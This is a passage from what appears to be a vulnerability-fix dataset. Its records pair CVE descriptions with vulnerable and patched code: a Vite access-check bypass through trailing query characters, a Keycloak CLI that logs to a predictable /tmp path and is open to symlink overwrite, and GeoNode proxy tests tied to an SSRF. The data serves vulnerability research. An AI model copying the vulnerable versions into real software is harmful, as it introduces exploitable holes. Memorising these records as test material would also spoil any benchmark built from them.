server.config.server.headers,\n })\n } catch (e) {\n // Outdated source map request for optimized deps, this isn't an error\n // but part of the normal flow when re-optimizing after missing deps\n // Send back an empty source map so the browser doesn't issue warnings\n const dummySourceMap = {\n version: 3,\n file: sourcemapPath.replace(/\\.map$/, ''),\n sources: [],\n sourcesContent: [],\n names: [],\n mappings: ';;;;;;;;;',\n }\n return send(req, res, JSON.stringify(dummySourceMap), 'json', {\n cacheControl: 'no-cache',\n headers: server.config.server.headers,\n })\n }\n } else {\n const originalUrl = url.replace(/\\.map($|\\?)/, '$1')\n const map = (await moduleGraph.getModuleByUrl(originalUrl, false))\n ?.transformResult?.map\n if (map) {\n return send(req, res, JSON.stringify(map), 'json', {\n headers: server.config.server.headers,\n })\n } else {\n return next()\n }\n }\n }\n\n // check if public dir is inside root dir\n const publicDir = normalizePath(server.config.publicDir)\n const rootDir = normalizePath(server.config.root)\n if (publicDir.startsWith(withTrailingSlash(rootDir))) {\n const publicPath = `${publicDir.slice(rootDir.length)}/`\n // warn explicit public paths\n if (url.startsWith(withTrailingSlash(publicPath))) {\n let warning: string\n\n if (isImportRequest(url)) {\n const rawUrl = removeImportQuery(url)\n if (urlRE.test(url)) {\n warning =\n `Assets in the public directory are served at the root path.\\n` +\n `Instead of ${colors.cyan(rawUrl)}, use ${colors.cyan(\n rawUrl.replace(publicPath, '/'),\n )}.`\n } else {\n warning =\n 'Assets in public directory cannot be imported from JavaScript.\\n' +\n `If you intend to import that asset, put the file in the src directory, and use ${colors.cyan(\n rawUrl.replace(publicPath, '/src/'),\n )} instead of ${colors.cyan(rawUrl)}.\\n` +\n `If you intend to use the URL of that asset, use ${colors.cyan(\n injectQuery(rawUrl.replace(publicPath, '/'), 'url'),\n )}.`\n }\n } else {\n warning =\n `files in the public directory are served at the root path.\\n` +\n `Instead of ${colors.cyan(url)}, use ${colors.cyan(\n url.replace(publicPath, '/'),\n )}.`\n }\n\n logger.warn(colors.yellow(warning))\n }\n }\n\n const urlWithoutTrailingQuerySeparators = url.replace(\n trailingQuerySeparatorsRE,\n '',\n )\n if (\n (rawRE.test(urlWithoutTrailingQuerySeparators) ||\n urlRE.test(urlWithoutTrailingQuerySeparators)) &&\n !ensureServingAccess(\n urlWithoutTrailingQuerySeparators,\n server,\n res,\n next,\n )\n ) {\n return\n }\n\n if (\n isJSRequest(url) ||\n isImportRequest(url) ||\n isCSSRequest(url) ||\n isHTMLProxy(url)\n ) {\n // strip ?import\n url = removeImportQuery(url)\n // Strip valid id prefix. This is prepended to resolved Ids that are\n // not valid browser import specifiers by the importAnalysis plugin.\n url = unwrapId(url)\n\n // for CSS, we need to differentiate between normal CSS requests and\n // imports\n if (\n isCSSRequest(url) &&\n !isDirectRequest(url) &&\n req.headers.accept?.includes('text/css')\n ) {\n url = injectQuery(url, 'direct')\n }\n\n // check if we can return 304 early\n const ifNoneMatch = req.headers['if-none-match']\n if (\n ifNoneMatch &&\n (await moduleGraph.getModuleByUrl(url, false))?.transformResult\n ?.etag === ifNoneMatch\n ) {\n debugCache?.(`[304] ${prettifyUrl(url, root)}`)\n res.statusCode = 304\n return res.end()\n }\n\n // resolve, load and transform using the plugin container\n const result = await transformRequest(url, server, {\n html: req.headers.accept?.includes('text/html'),\n })\n if (result) {\n const depsOptimizer = getDepsOptimizer(server.config, false) // non-ssr\n const type = isDirectCSSRequest(url) ? 'css' : 'js'\n const isDep =\n DEP_VERSION_RE.test(url) || depsOptimizer?.isOptimizedDepUrl(url)\n return send(req, res, result.code, type, {\n etag: result.etag,\n // allow browser to cache npm deps!\n cacheControl: isDep ? 'max-age=31536000,immutable' : 'no-cache',\n headers: server.config.server.headers,\n map: result.map,\n })\n }\n }\n } catch (e) {\n if (e?.code === ERR_OPTIMIZE_DEPS_PROCESSING_ERROR) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Optimize Deps Processing Error'\n res.end()\n }\n // This timeout is unexpected\n logger.error(e.message)\n return\n }\n if (e?.code === ERR_OUTDATED_OPTIMIZED_DEP) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Outdated Optimize Dep'\n res.end()\n }\n // We don't need to log an error in this case, the request\n // is outdated because new dependencies were discovered and\n // the new pre-bundle dependencies have changed.\n // A full-page reload has been issued, and these old requests\n // can't be properly fulfilled. This isn't an unexpected\n // error but a normal part of the missing deps discovery flow\n return\n }\n if (e?.code === ERR_CLOSED_SERVER) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Outdated Request'\n res.end()\n }\n // We don't need to log an error in this case, the request\n // is outdated because new dependencies were discovered and\n // the new pre-bundle dependencies have changed.\n // A full-page reload has been issued, and these old requests\n // can't be properly fulfilled. This isn't an unexpected\n // error but a normal part of the missing deps discovery flow\n return\n }\n if (e?.code === ERR_LOAD_URL) {\n // Let other middleware handle if we can't load the url via transformRequest\n return next()\n }\n return next(e)\n }\n\n next()\n }"}, {"id": "fix_js_248_2", "commit": "315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4", "file_path": "packages/vite/src/node/server/middlewares/transform.ts", "start_line": 47, "end_line": 47, "snippet": "const trailingQuerySeparatorsRE = /[?&]+$/"}], "vul_patch": "--- a/packages/vite/src/node/server/middlewares/transform.ts\n+++ b/packages/vite/src/node/server/middlewares/transform.ts\n@@ -111,9 +111,19 @@\n }\n }\n \n+ const urlWithoutTrailingQuerySeparators = url.replace(\n+ trailingQuerySeparatorsRE,\n+ '',\n+ )\n if (\n- (rawRE.test(url) || urlRE.test(url)) &&\n- !ensureServingAccess(url, server, res, next)\n+ (rawRE.test(urlWithoutTrailingQuerySeparators) ||\n+ urlRE.test(urlWithoutTrailingQuerySeparators)) &&\n+ !ensureServingAccess(\n+ urlWithoutTrailingQuerySeparators,\n+ server,\n+ res,\n+ next,\n+ )\n ) {\n return\n }\n\n--- /dev/null\n+++ b/packages/vite/src/node/server/middlewares/transform.ts\n@@ -0,0 +1 @@\n+const trailingQuerySeparatorsRE = /[?&]+$/\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-15111", "cve_description": "keycloak-httpd-client-install versions before 0.8 insecurely creates temporary file allowing local attackers to overwrite other files via symbolic link.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/jdennis/keycloak-httpd-client-install", "patch_url": ["https://github.com/jdennis/keycloak-httpd-client-install/commit/07f26e213196936fb328ea0c1d5a66a09d8b5440"], "programing_language": "Python", "vul_func": [{"id": "vul_py_84_1", "commit": "c3121b2", "file_path": "keycloak_httpd_client/keycloak_cli.py", "start_line": "846", "end_line": "1045", "snippet": "def main():\n global logger\n result = 0\n\n parser = argparse.ArgumentParser(description='Keycloak REST client',\n prog=prog_name,\n epilog=verbose_help.format(prog_name=prog_name),\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('-v', '--verbose', action='store_true',\n help='be chatty')\n\n parser.add_argument('-d', '--debug', action='store_true',\n help='turn on debug info')\n\n parser.add_argument('--show-traceback', action='store_true',\n help='exceptions print traceback in addition to '\n 'error message')\n\n parser.add_argument('--log-file',\n default='/tmp/{prog_name}.log'.format(\n prog_name=prog_name),\n help='log file pathname')\n\n parser.add_argument('--permit-insecure-transport', action='store_true',\n help='Normally secure transport such as TLS '\n 'is required, defeat this check')\n\n parser.add_argument('--tls-verify', action=TlsVerifyAction,\n default=True,\n help='TLS certificate verification for requests to'\n ' the server. May be one of case insenstive '\n '[true, yes, on] to enable,'\n '[false, no, off] to disable.'\n 'Or the pathname to a OpenSSL CA bundle to use.'\n ' Default is True.')\n\n group = parser.add_argument_group('Server')\n\n group.add_argument('-s', '--server',\n required=True,\n help='DNS name or IP address of Keycloak server')\n\n group.add_argument('-a', '--auth-role',\n choices=AUTH_ROLES,\n default='root-admin',\n help='authenticating as what type of user (default: root-admin)')\n\n group.add_argument('-u', '--admin-username',\n default='admin',\n help='admin user name (default: admin)')\n\n group.add_argument('-P', '--admin-password-file',\n type=argparse.FileType('rb'),\n help=('file containing admin password '\n '(or use a hyphen \"-\" to read the password '\n 'from stdin)'))\n\n group.add_argument('--admin-realm',\n default='master',\n help='realm admin belongs to')\n\n cmd_parsers = parser.add_subparsers(help='available commands')\n\n # --- realm commands ---\n realm_parser = cmd_parsers.add_parser('realm',\n help='realm operations')\n\n sub_parser = realm_parser.add_subparsers(help='realm commands')\n\n cmd_parser = sub_parser.add_parser('server_info',\n help='dump server info')\n cmd_parser.set_defaults(func=do_server_info)\n\n cmd_parser = sub_parser.add_parser('list',\n help='list realm names')\n cmd_parser.set_defaults(func=do_list_realms)\n\n cmd_parser = sub_parser.add_parser('create',\n help='create new realm')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_create_realm)\n\n cmd_parser = sub_parser.add_parser('delete',\n help='delete existing realm')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_delete_realm)\n\n cmd_parser = sub_parser.add_parser('metadata',\n help='retrieve realm metadata')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_get_realm_metadata)\n\n # --- client commands ---\n client_parser = cmd_parsers.add_parser('client',\n help='client operations')\n\n sub_parser = client_parser.add_subparsers(help='client commands')\n\n cmd_parser = sub_parser.add_parser('list',\n help='list client names')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n\n cmd_parser.set_defaults(func=do_list_clients)\n\n cmd_parser = sub_parser.add_parser('create',\n help='create new client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-m', '--metadata', type=argparse.FileType('rb'),\n required=True,\n help='SP metadata file or stdin')\n cmd_parser.set_defaults(func=do_create_client)\n\n cmd_parser = sub_parser.add_parser('register',\n help='register new client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-m', '--metadata', type=argparse.FileType('rb'),\n required=True,\n help='SP metadata file or stdin')\n cmd_parser.add_argument('--initial-access-token', required=True,\n help='realm initial access token for '\n 'client registeration')\n cmd_parser.set_defaults(func=do_register_client)\n\n cmd_parser = sub_parser.add_parser('delete',\n help='delete existing client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-c', '--client-name', required=True,\n help='client name')\n cmd_parser.set_defaults(func=do_delete_client)\n\n cmd_parser = sub_parser.add_parser('test',\n help='experimental test used during '\n 'development')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-c', '--client-name', required=True,\n help='client name')\n cmd_parser.set_defaults(func=do_client_test)\n\n # Process command line arguments\n options = parser.parse_args()\n configure_logging(options)\n\n if options.permit_insecure_transport:\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\n # Get admin password\n options.admin_password = None\n\n # 1. Try password file\n if options.admin_password_file is not None:\n options.admin_password = options.keycloak_admin_password_file.readline().strip()\n options.keycloak_admin_password_file.close()\n\n # 2. Try KEYCLOAK_ADMIN_PASSWORD environment variable\n if options.admin_password is None:\n if (('KEYCLOAK_ADMIN_PASSWORD' in os.environ) and\n (os.environ['KEYCLOAK_ADMIN_PASSWORD'])):\n options.admin_password = os.environ['KEYCLOAK_ADMIN_PASSWORD']\n\n try:\n anonymous_conn = KeycloakAnonymousConnection(options.server,\n options.tls_verify)\n\n admin_conn = KeycloakAdminConnection(options.server,\n options.auth_role,\n options.admin_realm,\n ADMIN_CLIENT_ID,\n options.admin_username,\n options.admin_password,\n options.tls_verify)\n except Exception as e:\n if options.show_traceback:\n traceback.print_exc()\n print(six.text_type(e), file=sys.stderr)\n result = 1\n return result\n\n try:\n if options.func == do_register_client:\n conn = admin_conn\n else:\n conn = admin_conn\n result = options.func(options, conn)\n except Exception as e:\n if options.show_traceback:\n traceback.print_exc()\n print(six.text_type(e), file=sys.stderr)\n result = 2\n return result\n\n return result"}], "fix_func": [{"id": "fix_py_84_1", "commit": "07f26e2", "file_path": "keycloak_httpd_client/keycloak_cli.py", "start_line": "846", "end_line": "1045", "snippet": "def main():\n global logger\n result = 0\n\n parser = argparse.ArgumentParser(description='Keycloak REST client',\n prog=prog_name,\n epilog=verbose_help.format(prog_name=prog_name),\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('-v', '--verbose', action='store_true',\n help='be chatty')\n\n parser.add_argument('-d', '--debug', action='store_true',\n help='turn on debug info')\n\n parser.add_argument('--show-traceback', action='store_true',\n help='exceptions print traceback in addition to '\n 'error message')\n\n parser.add_argument('--log-file',\n default='{prog_name}.log'.format(\n prog_name=prog_name),\n help='log file pathname')\n\n parser.add_argument('--permit-insecure-transport', action='store_true',\n help='Normally secure transport such as TLS '\n 'is required, defeat this check')\n\n parser.add_argument('--tls-verify', action=TlsVerifyAction,\n default=True,\n help='TLS certificate verification for requests to'\n ' the server. May be one of case insenstive '\n '[true, yes, on] to enable,'\n '[false, no, off] to disable.'\n 'Or the pathname to a OpenSSL CA bundle to use.'\n ' Default is True.')\n\n group = parser.add_argument_group('Server')\n\n group.add_argument('-s', '--server',\n required=True,\n help='DNS name or IP address of Keycloak server')\n\n group.add_argument('-a', '--auth-role',\n choices=AUTH_ROLES,\n default='root-admin',\n help='authenticating as what type of user (default: root-admin)')\n\n group.add_argument('-u', '--admin-username',\n default='admin',\n help='admin user name (default: admin)')\n\n group.add_argument('-P', '--admin-password-file',\n type=argparse.FileType('rb'),\n help=('file containing admin password '\n '(or use a hyphen \"-\" to read the password '\n 'from stdin)'))\n\n group.add_argument('--admin-realm',\n default='master',\n help='realm admin belongs to')\n\n cmd_parsers = parser.add_subparsers(help='available commands')\n\n # --- realm commands ---\n realm_parser = cmd_parsers.add_parser('realm',\n help='realm operations')\n\n sub_parser = realm_parser.add_subparsers(help='realm commands')\n\n cmd_parser = sub_parser.add_parser('server_info',\n help='dump server info')\n cmd_parser.set_defaults(func=do_server_info)\n\n cmd_parser = sub_parser.add_parser('list',\n help='list realm names')\n cmd_parser.set_defaults(func=do_list_realms)\n\n cmd_parser = sub_parser.add_parser('create',\n help='create new realm')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_create_realm)\n\n cmd_parser = sub_parser.add_parser('delete',\n help='delete existing realm')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_delete_realm)\n\n cmd_parser = sub_parser.add_parser('metadata',\n help='retrieve realm metadata')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_get_realm_metadata)\n\n # --- client commands ---\n client_parser = cmd_parsers.add_parser('client',\n help='client operations')\n\n sub_parser = client_parser.add_subparsers(help='client commands')\n\n cmd_parser = sub_parser.add_parser('list',\n help='list client names')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n\n cmd_parser.set_defaults(func=do_list_clients)\n\n cmd_parser = sub_parser.add_parser('create',\n help='create new client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-m', '--metadata', type=argparse.FileType('rb'),\n required=True,\n help='SP metadata file or stdin')\n cmd_parser.set_defaults(func=do_create_client)\n\n cmd_parser = sub_parser.add_parser('register',\n help='register new client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-m', '--metadata', type=argparse.FileType('rb'),\n required=True,\n help='SP metadata file or stdin')\n cmd_parser.add_argument('--initial-access-token', required=True,\n help='realm initial access token for '\n 'client registeration')\n cmd_parser.set_defaults(func=do_register_client)\n\n cmd_parser = sub_parser.add_parser('delete',\n help='delete existing client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-c', '--client-name', required=True,\n help='client name')\n cmd_parser.set_defaults(func=do_delete_client)\n\n cmd_parser = sub_parser.add_parser('test',\n help='experimental test used during '\n 'development')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-c', '--client-name', required=True,\n help='client name')\n cmd_parser.set_defaults(func=do_client_test)\n\n # Process command line arguments\n options = parser.parse_args()\n configure_logging(options)\n\n if options.permit_insecure_transport:\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\n # Get admin password\n options.admin_password = None\n\n # 1. Try password file\n if options.admin_password_file is not None:\n options.admin_password = options.keycloak_admin_password_file.readline().strip()\n options.keycloak_admin_password_file.close()\n\n # 2. Try KEYCLOAK_ADMIN_PASSWORD environment variable\n if options.admin_password is None:\n if (('KEYCLOAK_ADMIN_PASSWORD' in os.environ) and\n (os.environ['KEYCLOAK_ADMIN_PASSWORD'])):\n options.admin_password = os.environ['KEYCLOAK_ADMIN_PASSWORD']\n\n try:\n anonymous_conn = KeycloakAnonymousConnection(options.server,\n options.tls_verify)\n\n admin_conn = KeycloakAdminConnection(options.server,\n options.auth_role,\n options.admin_realm,\n ADMIN_CLIENT_ID,\n options.admin_username,\n options.admin_password,\n options.tls_verify)\n except Exception as e:\n if options.show_traceback:\n traceback.print_exc()\n print(six.text_type(e), file=sys.stderr)\n result = 1\n return result\n\n try:\n if options.func == do_register_client:\n conn = admin_conn\n else:\n conn = admin_conn\n result = options.func(options, conn)\n except Exception as e:\n if options.show_traceback:\n traceback.print_exc()\n print(six.text_type(e), file=sys.stderr)\n result = 2\n return result\n\n return result"}], "vul_patch": "--- a/keycloak_httpd_client/keycloak_cli.py\n+++ b/keycloak_httpd_client/keycloak_cli.py\n@@ -18,7 +18,7 @@\n 'error message')\n \n parser.add_argument('--log-file',\n- default='/tmp/{prog_name}.log'.format(\n+ default='{prog_name}.log'.format(\n prog_name=prog_name),\n help='log file pathname')\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-40017", "cve_description": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. In versions 3.2.0 through 4.1.2, the endpoint `/proxy/?url=` does not properly protect against server-side request forgery. This allows an attacker to port scan internal hosts and request information from internal hosts. A patch is available at commit a9eebae80cb362009660a1fd49e105e7cdb499b9.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/GeoNode/geonode", "patch_url": ["https://github.com/GeoNode/geonode/commit/a9eebae80cb362009660a1fd49e105e7cdb499b9"], "programing_language": "Python", "vul_func": [{"id": "vul_py_160_1", "commit": "618776e", "file_path": "geonode/proxy/tests.py", "start_line": 63, "end_line": 261, "snippet": " self.maxDiff = None\n self.admin = get_user_model().objects.get(username=\"admin\")\n\n # FIXME(Ariel): These tests do not work when the computer is offline.\n self.proxy_url = \"/proxy/\"\n self.url = TEST_URL\n\n @override_settings(DEBUG=True, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is True, all hosts pass the proxy.\"\"\"\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertTrue(response.status_code in (200, 301), response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_not_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is False requests should return 403.\"\"\"\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertEqual(response.status_code, 403, response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=(TEST_DOMAIN,))\n def test_proxy_allowed_host(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is not empty and DEBUG is False requests should return no error.\"\"\"\n self.client.login(username=\"admin\", password=\"admin\")\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertEqual(response.status_code, 200, response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=())\n def test_validate_remote_services_hosts(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is False requests should return 200\n for Remote Services hosts.\"\"\"\n from geonode.services.models import Service\n from geonode.services.enumerations import WMS, INDEXED\n\n Service.objects.get_or_create(\n type=WMS,\n name=\"Bogus\",\n title=\"Pocus\",\n owner=self.admin,\n method=INDEXED,\n base_url=\"http://bogus.pocus.com/ows\",\n )\n response = self.client.get(f\"{self.proxy_url}?url=http://bogus.pocus.com/ows/wms?request=GetCapabilities\")\n # 200 - FOUND\n self.assertTrue(response.status_code in (200, 301))\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=(\".example.org\",))\n def test_relative_urls(self):\n \"\"\"Proxying to a URL with a relative path element should normalise the path into\n an absolute path before calling the remote URL.\"\"\"\n import geonode.proxy.views\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = {\"Content-Type\": \"text/html\"}\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n geonode.proxy.views.http_client.request = request_mock\n url = \"http://example.org/test/test/../../index.html\"\n\n self.client.get(f\"{self.proxy_url}?url={url}\")\n assert request_mock.call_args[0][0] == \"http://example.org/index.html\"\n\n def test_proxy_preserve_headers(self):\n \"\"\"The GeoNode Proxy should preserve the original request headers.\"\"\"\n import geonode.proxy.views\n\n _test_headers = {\n \"Access-Control-Allow-Credentials\": False,\n \"Access-Control-Allow-Headers\": \"Content-Type, Accept, Authorization, Origin, User-Agent\",\n \"Access-Control-Allow-Methods\": \"GET, POST, PUT, PATCH, OPTIONS\",\n \"Cache-Control\": \"public, must-revalidate, max-age = 30\",\n \"Connection\": \"keep-alive\",\n \"Content-Language\": \"en\",\n \"Content-Length\": 116559,\n \"Content-Type\": \"image/tiff\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n \"Date\": \"Fri, 05 Nov 2021 17: 19: 11 GMT\",\n \"Server\": \"nginx/1.17.2\",\n \"Set-Cookie\": \"sessionid = bogus-pocus; HttpOnly; Path=/; SameSite=Lax\",\n \"Strict-Transport-Security\": \"max-age=3600; includeSubDomains\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n }\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = _test_headers\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n geonode.proxy.views.http_client.request = request_mock\n url = \"http://example.org/test/test/../../image.tiff\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertDictContainsSubset(\n dict(response.headers.copy()),\n {\n \"Content-Type\": \"text/plain\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n \"Referrer-Policy\": \"same-origin\",\n \"X-Frame-Options\": \"SAMEORIGIN\",\n \"Content-Language\": \"en-us\",\n \"Content-Length\": \"119\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n },\n )\n\n\nclass DownloadResourceTestCase(GeoNodeBaseTestSupport):\n def setUp(self):\n super().setUp()\n self.maxDiff = None\n create_models(type=\"dataset\")\n\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_url_with_not_existing_file(self):\n dataset = Dataset.objects.all().first()\n self.client.login(username=\"admin\", password=\"admin\")\n # ... all should be good\n response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n # Espected 404 since there are no files available for this layer\n self.assertEqual(response.status_code, 404)\n content = response.content\n if isinstance(content, bytes):\n content = content.decode(\"UTF-8\")\n data = content\n self.assertTrue(\"No files have been found for this resource. Please, contact a system administrator.\" in data)\n\n @patch(\"geonode.storage.manager.storage_manager.exists\")\n @patch(\"geonode.storage.manager.storage_manager.open\")\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_url_with_existing_files(self, fopen, fexists):\n fexists.return_value = True\n fopen.return_value = SimpleUploadedFile(\"foo_file.shp\", b\"scc\")\n dataset = Dataset.objects.all().first()\n\n dataset.files = [\n \"/tmpe1exb9e9/foo_file.dbf\",\n \"/tmpe1exb9e9/foo_file.prj\",\n \"/tmpe1exb9e9/foo_file.shp\",\n \"/tmpe1exb9e9/foo_file.shx\",\n ]\n\n dataset.save()\n\n dataset.refresh_from_db()\n\n upload = Upload.objects.create(state=\"RUNNING\", resource=dataset)\n\n assert upload\n\n self.client.login(username=\"admin\", password=\"admin\")\n # ... all should be good\n response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n # Espected 404 since there are no files available for this layer\n self.assertEqual(response.status_code, 200)\n self.assertEqual(\"application/zip\", response.headers.get(\"Content-Type\"))\n self.assertEqual('attachment; filename=\"CA.zip\"', response.headers.get(\"Content-Disposition\"))\n\n @patch(\"geonode.storage.manager.storage_manager.exists\")\n @patch(\"geonode.storage.manager.storage_manager.open\")\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_files(self, fopen, fexists):\n fexists.return_value = True\n fopen.return_value = SimpleUploadedFile(\"foo_file.shp\", b\"scc\")\n dataset = Dataset.objects.all().first()\n\n dataset.files = [\n \"/tmpe1exb9e9/foo_file.dbf\",\n \"/tmpe1exb9e9/foo_file.prj\",\n \"/tmpe1exb9e9/foo_file.shp\",\n \"/tmpe1exb9e9/foo_file.shx\",\n ]\n\n dataset.save()\n\n dataset.refresh_from_db()\n\n Upload.objects.create(state=\"COMPLETE\", resource=dataset)\n\n self.client.login(username=\"admin\", password=\"admin\")\n response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n # headers and status assertions\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.get(\"content-type\"), \"application/zip\")\n self.assertEqual(response.get(\"content-disposition\"), f'attachment; filename=\"{dataset.name}.zip\"')\n # Inspect content\n zip_content = io.BytesIO(b\"\".join(response.streaming_content))"}], "fix_func": [{"id": "fix_py_160_1", "commit": "a9eebae", "file_path": "geonode/proxy/tests.py", "start_line": 70, "end_line": 268, "snippet": " @override_settings(DEBUG=True, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is True, all hosts pass the proxy.\"\"\"\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertTrue(response.status_code in (200, 301), response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_not_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is False requests should return 403.\"\"\"\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertEqual(response.status_code, 403, response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=(TEST_DOMAIN,))\n def test_proxy_allowed_host(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is not empty and DEBUG is False requests should return no error.\"\"\"\n self.client.login(username=\"admin\", password=\"admin\")\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertEqual(response.status_code, 200, response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=())\n def test_validate_remote_services_hosts(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is False requests should return 200\n for Remote Services hosts.\"\"\"\n from geonode.services.models import Service\n from geonode.services.enumerations import WMS, INDEXED\n\n Service.objects.get_or_create(\n type=WMS,\n name=\"Bogus\",\n title=\"Pocus\",\n owner=self.admin,\n method=INDEXED,\n base_url=\"http://bogus.pocus.com/ows\",\n )\n response = self.client.get(f\"{self.proxy_url}?url=http://bogus.pocus.com/ows/wms?request=GetCapabilities\")\n # 200 - FOUND\n self.assertTrue(response.status_code in (200, 301))\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=(\".example.org\",))\n def test_relative_urls(self):\n \"\"\"Proxying to a URL with a relative path element should normalise the path into\n an absolute path before calling the remote URL.\"\"\"\n import geonode.proxy.views\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = {\"Content-Type\": \"text/html\"}\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n geonode.proxy.views.http_client.request = request_mock\n url = \"http://example.org/test/test/../../index.html\"\n\n self.client.get(f\"{self.proxy_url}?url={url}\")\n assert request_mock.call_args[0][0] == \"http://example.org/index.html\"\n\n def test_proxy_preserve_headers(self):\n \"\"\"The GeoNode Proxy should preserve the original request headers.\"\"\"\n import geonode.proxy.views\n\n _test_headers = {\n \"Access-Control-Allow-Credentials\": False,\n \"Access-Control-Allow-Headers\": \"Content-Type, Accept, Authorization, Origin, User-Agent\",\n \"Access-Control-Allow-Methods\": \"GET, POST, PUT, PATCH, OPTIONS\",\n \"Cache-Control\": \"public, must-revalidate, max-age = 30\",\n \"Connection\": \"keep-alive\",\n \"Content-Language\": \"en\",\n \"Content-Length\": 116559,\n \"Content-Type\": \"image/tiff\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n \"Date\": 